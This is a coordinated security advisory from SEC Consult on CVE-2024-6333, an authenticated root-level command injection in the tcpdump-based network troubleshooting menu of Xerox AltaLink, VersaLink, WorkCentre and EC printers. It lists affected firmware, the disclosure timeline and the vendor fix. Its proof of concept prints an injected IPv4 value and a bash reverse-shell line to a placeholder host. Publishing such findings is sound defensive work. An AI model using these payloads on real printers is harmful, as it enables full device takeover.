SEC Consult Vulnerability Lab Security Advisory < 20241023-0 > ======================================================================= title: Authenticated Remote Code Execution product: Multiple Xerox printers (EC80xx, AltaLink, VersaLink, WorkCentre) vulnerable version: see vulnerable versions below fixed version: see solution section below CVE number: CVE-2024-6333 impact: high homepage: https://xerox.com found: 2023-12-14 by: Timo Longin (Office Vienna) Tamas Jos (Office Zurich) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "We are a global leader in office and production print technology and related solutions, with a large and growing presence in Digital and IT Services. Having redefined the workplace experience for more than 100 years, our differentiated business and technology offerings are empowering client success today by addressing the productivity challenges of a hybrid workplace and distributed workforce." Source: https://investors.xerox.com/ Business recommendation: ------------------------ SEC Consult recommends Xerox customers to install the latest updates and review the vendor's security note for further information. Also make sure to have patches from previous security notes installed, such as XRX23-020. SEC Consult has re-identified some critical 0-days (unauthenticated RCE, partial authentication bypass) that were already patched but not clearly communicated in the previous security notes. SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: ----------------------------------- 1) Authenticated Remote Code Execution (RCE) (CVE-2024-6333) An attacker authenticated as a user with administrative access to the web interface of a range of affected Xerox printers can exploit a remote code execution vulnerability (RCE) as root user. It allows an attacker to execute commands directly on the operating system of the printer with root permissions. Consequently, the target Xerox printer can be fully compromised. Proof of concept: ----------------- 1) Authenticated Remote Code Execution (RCE) (CVE-2024-6333) The "Network Troubleshooting" menu enables administrators to configure and run network troubleshooting based on the tcpdump tool. The web interface allows to apply custom filters like an IPv4 address as well as specific network services, as seen in the image (figure 1) below. Due to insufficient input validation in the IPv4 address value, an attacker may inject further OS commands into the final tcpdump command string. For example, by setting the IPv4 address to the value "0.0.0.0$(bash $TMP~cmd)", commands stored under "/tmp/~cmd" get executed, when starting a network troubleshooting session. Note: The payload in the IPv4 address must bypass a character filter, and was kept simple for demonstration purposes. Other payloads that directly execute commands without requiring the "/tmp/~cmd" file exist and can be crafted. An attacker who, for example, has previously exploited the unauthenticated RCE vulnerability (fixed with Xerox Security Bulletin XRX23-020) can plant the following commands for a reverse shell in to "/tmp/~cmd". ------------------------------------------------------------------------------- bash -i >/dev/tcp/X.X.X.X/10004 0>&1 2>&1 ------------------------------------------------------------------------------- Since, the network troubleshooting service is running tcpdump with root permissions, full access to a range of Xerox printers can be obtained this way. See figure 2 below. Vulnerable versions: ----------------------------- The following products & versions have been tested initially, which were not patched to the latest version according to vendor. Hence our other identified critical security issues were removed from this advisory. * Xerox Workcentre 7970 (073.200.167.09610) * Xerox Workcentre 7855 (073.040.167.09610) According to the vendor, the following products are affected: * AltaLink® B8045 / B8055 / B8065 / B8075 / B8090 (<103.xxx.024.18600 866140v3) * AltaLink® C8030 / C8035 / C8045 / C8055 / C8070 (<103.xxx.024.18600 866140v3) * Xerox® EC8036 / EC8056 (<103.xxx.024.18600 872818v3) * Xerox® EC8036 / EC8056 - Common Criteria (June 2022) (<103.023.031.35105 878257v3) * Xerox® EC8036 / EC8056 - Common Criteria (June 2024) (<103.xxx.013.14115 869823v3) * AltaLink®C8130 / C8135 / C8145 / C8155 / C8170 - Common Criteria (Aug 2024) (<119.xxx.023.13006 869829v3) * AltaLink® B8145 / B8155 / B8170 - Common Criteria (Aug 2024) (<119.xxx.023.13006 869829v3) * AltaLink® C8130 / C8135 / C8145 / C8155 / C8170 - Common Criteria Certified (Aug 2023) (<111.xxx.003.11600 869827v3) * AltaLink® B8145 / B8155 / B8170 - Common Criteria Certified (Aug 2023) (<111.xxx.003.11600 869827v3) * VersaLink® B625 / C625 - Common Criteria Certified (2024) (<119.xxx.003.11705 869818v3) * VersaLink® B415 / C415 - Common Criteria Certified (2024) (<119.xxx.003.11705 869818v3) * WorkCentre 3655/3655i (<075.060.004.07810 via Upgrade Tool) * WorkCentre 5945/55i (<075.091.004.07810 via Upgrade Tool) * WorkCentre 6655/6655i (<075.110.004.07810 via Upgrade Tool) * WorkCentre 7220/7225i (<075.030.004.07810 via Upgrade Tool) * WorkCentre 7830/7835i (<075.010 004.07810 via Upgrade Tool) * WorkCentre 7845/7855i (<075.040.004.07810 via Upgrade Tool) * WorkCentre 7845/7855 (IBG) (<075.080.004.07810 via Upgrade Tool) * WorkCentre 7970/7970i (<075.200.004.07810 via Upgrade Tool) * WorkCentre EC7836 (<075.050.004.07810 via Upgrade Tool) * WorkCentre EC7856 (<075.020.004.07810 via Upgrade Tool) Vendor contact timeline: ------------------------ 2024-02-05: Contacting vendor through the Xerox Security Response Center (XSRC) https://forms.business.xerox.com/en-us/xerox-security-response-center/ 2024-02-06: Xerox assigns case id XSRC-2024-0003 2024-02-08: Xerox provides links for the current firmware versions to confirm whether the issues can be reproduced. 2024-02-27: Xerox asks for status update. 2024-02-28: The authenticated RCE was confirmed to be exploitable in the current firmware version (075.040.013.29000 and 075.200.013.29000). Vulnerability one and two are fixed in the most recent versions. 2024-03-19: Xerox requests more information on provided PoCs. 2024-04-02: SEC Consult provides the requested information. 2024-04-18: SEC Consult asks for updates on the vulnerability status. 2024-05-06: Xerox provides an update/patch for the affected WorkCentre7890 and 7855 series. 2024-05-16: SEC Consult asks about a CVE number for the authenticated RCE vulnerability. Also SEC Consult inquires about for further plans on confirming the affected models and versions that are potentially affected by the partial authentication bypass and pre-authenticated RCE vulnerabilities. 2024-05-21: Xerox states that they are evaluating other models. Also, they request a CVSS score and vector for the authenticated RCE. Furthermore, more details on the public disclosure timeline are requested. 2024-05-23: SEC Consult provides the requested information. 2024-06-03: Status update from Xerox regarding CVE-ID request. Furthermore, more information on the to be released advisory is requested. 2024-06-06: Status update from Xerox regarding CVE-ID request. 2024-06-10: Xerox again requests a CVSS score and vector for the authenticated RCE. 2024-06-14: SEC Consult again provides the CVSS score and vector. Also, information on the to be released advisory is provided. 2024-06-25: Xerox provides CVE-2024-6333 for the authenticated RCE vulnerability. 2024-06-28: Informing Xerox about longer vacation period / absence. Asking again about further affected models. 2024-07-01: Xerox: Further models are affected, will be shared in the final publication. 2024-07-16: Xerox asks for our publication draft. 2024-07-31: Xerox asks again for our publication draft. 2024-07-31: SEC Consult reminds Xerox about vacation, references our draft advisory already sent a few months ago. Asking whether the other models are affected by the authenticated RCE only, or by the other identified vulnerabilities as well. 2024-08-28: Xerox provides high-level summary of the case, but no details on affected models. 2024-10-03: SEC Consult provides an updated advisory with minor changes to Xerox, again asking whether other versions and models are affected by the described vulnerabilities. 2024-10-07: Xerox provides further information on the partial authentication bypass and pre-authenticated RCE vulnerabilities, showing that these have been addressed in previous patches. Also, further coordination regarding Xerox' Security Bulletin Release. 2024-10-16: Release of Xerox Security Bulletin XRX24-015, covering the authenticated RCE vulnerability. 2024-10-21: Sending latest advisory draft to Xerox, setting release date to 23rd October. Asking Xerox whether the security bulletin XRX23-020 (https://securitydocs.business.xerox.com/wp-content/uploads/2023/11/XRX23-020_Security-Bulletin-for-AltaLink-VersaLink-and-WorkCentre-1.pdf) is the correct one for the other issues and why there is no mention regarding our pre-auth RCE there. Xerox responds with the link to the latest XRX24-015 bulletin and that our advisory is fine. 2024-10-23: Coordinated release of advisory. Solution: --------- Xerox provided patches for the affected printers. More information can be found in Xerox' Security Bulletin XRX24-015: https://securitydocs.business.xerox.com/wp-content/uploads/2024/10/Xerox-Security-Bulletin-XRX24-015-for-Altalink-Versalink-and-WorkCentre-%E2%80%93-CVE-2024-6333-.pdf Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: https://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Timo Longin, Tamas Jos / @2024